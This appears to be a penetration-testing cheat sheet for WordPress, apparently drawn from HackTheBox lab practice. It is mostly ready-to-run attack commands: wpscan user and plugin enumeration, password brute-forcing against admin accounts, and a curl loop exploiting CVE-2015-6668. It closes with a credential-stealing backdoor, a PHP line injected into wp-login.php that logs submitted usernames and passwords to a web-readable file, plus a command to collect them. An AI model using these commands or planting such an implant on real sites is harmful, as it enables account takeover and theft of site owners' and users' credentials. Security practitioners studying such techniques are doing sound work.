Wordpress
Last updated
Last updated
nmap -n -p<PORT> --script http-wordpress-enum <DNS>bashwpscangem install wpscanwpscan --url https://example.comwpscan --url https://example.com --enumerate uwpscan --url https://example.com --enumerate apwpscan --url https://example.com --enumerate atwpscan --url https://example.com --output example.jsonwpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"wpscan --url https://brainfuck.htb --disable-tls-checksBrute-Forcing
wpscan --url https://example.com --passwords passwords.txt --usernames adminwpscan --url https://example.com --passwords passwords.txt --usernames users.txtwpscan --url https://example.com --passwords custom.txtVulnerability Scanner
wpscan --url https://example.com --enumerate vp,vt,vtwpscan --url https://example.com --enumerate vpwpscan --url https://example.com --enumerate vtwpscan --url https://example.com --enumerate ttwpscan --url https://example.com --enumerate vp,vt,vt --api-token YOUR_API_TOKENVulnerabilitiesCVE-2015-6668
There is a path traversal in the job-manager plugin version 0.7.25
By browsing to IP/index.php/jobs/apply/8/ and modifying the number in the URL, it is possible to find the names of existing applications.
for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; doneUse this to look for files associated to an application.
Harvesting CredentialsIf is possible to write in wp-login.php, add this line just after <?php:
file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);Use this command to get the hijacked file as soon as is used:
watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt